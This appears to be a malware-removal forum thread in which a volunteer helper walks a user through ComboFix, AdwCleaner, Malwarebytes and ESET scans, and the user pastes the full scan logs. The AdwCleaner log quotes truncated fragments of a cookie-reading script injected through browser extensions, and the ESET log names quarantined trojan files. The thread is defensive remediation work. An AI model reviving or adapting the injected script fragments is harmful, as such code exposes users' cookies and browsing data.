2015-08-11 04:52 . 2015-09-01 04:30    69416    ----a-w-    c:\windows\SysWow64\nvaudcap32v.dll
2015-08-11 04:52 . 2015-09-01 04:30    50472    ----a-w-    c:\windows\system32\drivers\nvvad64v.sys
2015-08-11 04:52 . 2015-08-26 23:31    72504    ----a-w-    c:\windows\system32\nvaudcap64v.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Steam"="e:\steam\steam.exe" [2015-10-08 2900560]
"Skype"="c:\program files (x86)\Skype\Phone\Skype.exe" [2015-07-29 53655680]
"CreativeTaskScheduler"="c:\program files (x86)\Creative\Shared Files\CTSched.exe" [2006-11-17 53341]
"Akamai NetSession Interface"="c:\users\Rainsford\AppData\Local\Akamai\netsession_win.exe" [2015-09-11 4691384]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"CTxfiHlp"="CTXFIHLP.EXE" [2014-03-01 24576]
"Corsair Utility Engine"="c:\program files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" [2015-08-28 12844864]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 BRDriver64_1_3_3_E02B25FC;BRDriver64_1_3_3_E02B25FC;c:\programdata\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys;c:\programdata\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [x]
R3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;c:\program files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe;c:\program files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [x]
R3 CT20XUT;CT20XUT;c:\windows\system32\drivers\CT20XUT.SYS;c:\windows\SYSNATIVE\drivers\CT20XUT.SYS [x]
R3 CTEXFIFX;CTEXFIFX;c:\windows\system32\drivers\CTEXFIFX.SYS;c:\windows\SYSNATIVE\drivers\CTEXFIFX.SYS [x]
R3 CTHWIUT;CTHWIUT;c:\windows\system32\drivers\CTHWIUT.SYS;c:\windows\SYSNATIVE\drivers\CTHWIUT.SYS [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 EasyAntiCheat;EasyAntiCheat;c:\windows\system32\EasyAntiCheat.exe;c:\windows\SYSNATIVE\EasyAntiCheat.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des;c:\windows\SYSNATIVE\GameMon.des [x]
R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
R3 Point64;Microsoft Mouse and Keyboard Center Filter Driver;c:\windows\system32\DRIVERS\point64.sys;c:\windows\SYSNATIVE\DRIVERS\point64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 rzudd;Razer Mouse Driver;c:\windows\system32\DRIVERS\rzudd.sys;c:\windows\SYSNATIVE\DRIVERS\rzudd.sys [x]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys;c:\windows\SYSNATIVE\drivers\synth3dvsc.sys [x]
R3 terminpt;Microsoft Remote Desktop Input Driver;c:\windows\system32\drivers\terminpt.sys;c:\windows\SYSNATIVE\drivers\terminpt.sys [x]
R3 TRIDCap;AVerMedia service;c:\windows\system32\DRIVERS\AVerTM62_x64.sys;c:\windows\SYSNATIVE\DRIVERS\AVerTM62_x64.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys;c:\windows\SYSNATIVE\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys;c:\windows\SYSNATIVE\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 X6va012;X6va012;c:\windows\SysWOW64\Drivers\X6va012;c:\windows\SysWOW64\Drivers\X6va012 [x]
R3 xhunter1;xhunter1;c:\windows\xhunter1.sys;c:\windows\xhunter1.sys [x]
R3 XSplit_Dummy;XSplit  Stream  Audio  Renderer;c:\windows\system32\drivers\xspltspk.sys;c:\windows\SYSNATIVE\drivers\xspltspk.sys [x]
R4 BEService;BattlEye Service;c:\program files (x86)\Common Files\BattlEye\BEService.exe;c:\program files (x86)\Common Files\BattlEye\BEService.exe [x]
R4 GalaxyClientService;GalaxyClientService;c:\program files (x86)\GalaxyClient\GalaxyClientService.exe;c:\program files (x86)\GalaxyClient\GalaxyClientService.exe [x]
R4 GalaxyCommunication;GalaxyCommunication;c:\programdata\GOG.com\Galaxy\redists\GalaxyCommunication.exe;c:\programdata\GOG.com\Galaxy\redists\GalaxyCommunication.exe [x]
R4 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
R4 Origin Client Service;Origin Client Service;c:\program files (x86)\Origin\OriginClientService.exe;c:\program files (x86)\Origin\OriginClientService.exe [x]
S2 AlienFusionService;Alienware Fusion Service;c:\program files\Alienware\Command Center\AlienFusionService.exe;c:\program files\Alienware\Command Center\AlienFusionService.exe [x]
S2 GfExperienceService;NVIDIA GeForce Experience Service;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [x]
S2 NvNetworkService;NVIDIA Network Service;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [x]
S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [x]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x]
S3 AWOPFilterDriver;AWOPFilterDriver;c:\windows\system32\drivers\AWOPFilterDriver.sys;c:\windows\SYSNATIVE\drivers\AWOPFilterDriver.sys [x]
S3 CorsairVBusDriver;Corsair Bus;c:\windows\system32\DRIVERS\CorsairVBusDriver.sys;c:\windows\SYSNATIVE\DRIVERS\CorsairVBusDriver.sys [x]
S3 CorsairVHidDriver;Corsair virtual device;c:\windows\system32\DRIVERS\CorsairVHidDriver.sys;c:\windows\SYSNATIVE\DRIVERS\CorsairVHidDriver.sys [x]
S3 CT20XUT.SYS;CT20XUT.SYS;c:\windows\System32\drivers\CT20XUT.SYS;c:\windows\SYSNATIVE\drivers\CT20XUT.SYS [x]
S3 CTEXFIFX.SYS;CTEXFIFX.SYS;c:\windows\System32\drivers\CTEXFIFX.SYS;c:\windows\SYSNATIVE\drivers\CTEXFIFX.SYS [x]
S3 CTHWIUT.SYS;CTHWIUT.SYS;c:\windows\System32\drivers\CTHWIUT.SYS;c:\windows\SYSNATIVE\drivers\CTHWIUT.SYS [x]
S3 ha20x22k;Creative 20X2 HAL Driver;c:\windows\system32\drivers\ha20x22k.sys;c:\windows\SYSNATIVE\drivers\ha20x22k.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 LVRS64;Logitech RightSound Filter Driver;c:\windows\system32\DRIVERS\lvrs64.sys;c:\windows\SYSNATIVE\DRIVERS\lvrs64.sys [x]
S3 LVUVC64;Logitech HD Webcam C270(UVC);c:\windows\system32\DRIVERS\lvuvc64.sys;c:\windows\SYSNATIVE\DRIVERS\lvuvc64.sys [x]
S3 mio;Master IO Filter Driver;c:\windows\system32\DRIVERS\mio.sys;c:\windows\SYSNATIVE\DRIVERS\mio.sys [x]
S3 NvStreamKms;NvStreamKms;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
S3 Phosgene;FaceRig Virtual Camera;c:\windows\system32\DRIVERS\Phosgene.sys;c:\windows\SYSNATIVE\DRIVERS\Phosgene.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - 14659178
*Deregistered* - 14659178
.
Contents of the 'Scheduled Tasks' folder
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-11-11 21:24]
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-11-11 21:24]
.
2015-10-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job
- c:\users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2014-06-15 21:21]
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job
- c:\users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2014-06-15 21:21]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
"Command Center Controllers"="c:\program files\Alienware\Command Center\AWCCStartupOrchestrator.exe" [2012-06-18 12656]
"NvBackend"="c:\program files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe" [2015-08-27 2634872]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = <local>
TCP: DhcpNameServer = 192.168.1.254
FF - ProfilePath - c:\users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\
FF - user.js: general.useragent.extra.brc -
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\X6va012]
"ImagePath"="\??\c:\windows\SysWOW64\Drivers\X6va012"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_235_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_235_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-10-11  10:00:52
ComboFix-quarantined-files.txt  2015-10-11 15:00
.
Pre-Run: 395,795,238,912 bytes free
Post-Run: 395,913,523,200 bytes free
.
- - End Of File - - 10F659E74858BF9751484A55B60B49E0
A36C5E4F47E84449FF07ED3517B43A31
 



#8 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 11 October 2015 - 10:07 AM

Ok, and now the standard scans:

Step 1

Please download adwcleaner.png AdwCleaner (by Xplode) and save it to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Cleaning button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
    Copy and paste the contents of that logfile in your next reply.
Step 2

v21logo.PNG

Scan with Malwarebytes Anti-Malware.
  • Please open Malwarebytes Anti-Malware and update the database.
  • Click "Settings" [1] and go to "Detection and Protection" [2]
  • Make sure "Scan for Rootkits" is checked.
  • Click on Dashboard [3], then click on Scan Now [4] to start the scan.
    :exclame: If Malware or Potentially Unwanted Programs [PUPs] are found, you will receive a prompt:
    m21p.png
  • Click on "Remove Selected" [5].
  • Then click "Save Results" [6] and select
    m21p4.png
  • Return to our forum. Paste your log into your next reply and then click Finish [7].
mbamv21.gif

Step 3

Please downloadesetlogo.pngOnline Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start installer.pngwith administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings:
settings.png
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed, click on Finish.
  • A log filelog.pngis created at logpath.png
    Copy and paste the content of this log file in your next reply.
esetlog.png

Note: Do not forget to re-enable your antivirus application after running the above scan!
eset.gif
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#9 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 11 October 2015 - 11:44 AM

Alright, here are two logs of the first 2 i used. The third is still scanning and I have to go to work now but at 50% it says it has found 19 items. When it finishes do I clean it or post the log and await your instruction?

 

ADW CLEANER

 

# AdwCleaner v5.013 - Logfile created 11/10/2015 at 10:16:08
# Updated 09/10/2015 by Xplode
# Database : 2015-10-09.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Rainsford - PHOTON
# Running from : C:\Users\Rainsford\Desktop\AdwCleaner.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\ProgramData\62fa9ad6afe160d7
[-] Folder Deleted : C:\Users\Rainsford\AppData\Local\torch

***** [ Files ] *****

[-] File Deleted : C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\user.js

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3D0F43D9-C1D7-733C-01F8-4A3001BF8CC3}

***** [ Web browsers ] *****

[-] [C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.JOItLA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"txtlnkusaolp00000800\")>-1url.indexOf(\"sumo[...]
[-] [C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.mrapmA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"txtlnkusaolp00000800\")>-1url.indexOf(\"sumo[...]
[-] [C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com

*************************

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1854 bytes] ##########

 

MALWAREBYTES

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/11/2015
Scan Time: 10:20 AM
Logfile:
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.10.11.04
Rootkit Database: v2015.10.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Rainsford

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 412437
Time Elapsed: 10 min, 46 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#10 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 11 October 2015 - 11:57 AM

When it finishes do I clean it or post the log and await your instruction?


Please follow the instructions.

BTW: Rootkit-Search during the MBAM-Scan wasn't enabled as well. :)
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#11 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 11 October 2015 - 06:34 PM

AH, my deepest apologies, I thought I clicked the rootkit option. Here is the updated malwarebytes scan as well as the ESET one.

 

MalwareBytes

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/11/2015
Scan Time: 6:22 PM
Logfile:
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.10.11.05
Rootkit Database: v2015.10.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Rainsford

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 413478
Time Elapsed: 11 min, 50 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

ESET

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# end=init
# utc_time=2015-10-11 03:32:10
# local_time=2015-10-11 10:32:10 (-0600, Central Daylight Time)
# country="United States"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
Update Finalize
Updated modules version: 26183
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# end=updated
# utc_time=2015-10-11 03:34:33
# local_time=2015-10-11 10:34:33 (-0600, Central Daylight Time)
# country="United States"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# engine=26183
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2015-10-11 05:17:36
# local_time=2015-10-11 12:17:36 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5895 16777213 100 100 24338261 85785572 0 0
# scanned=352015
# found=19
# cleaned=0
# scan_time=6182
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
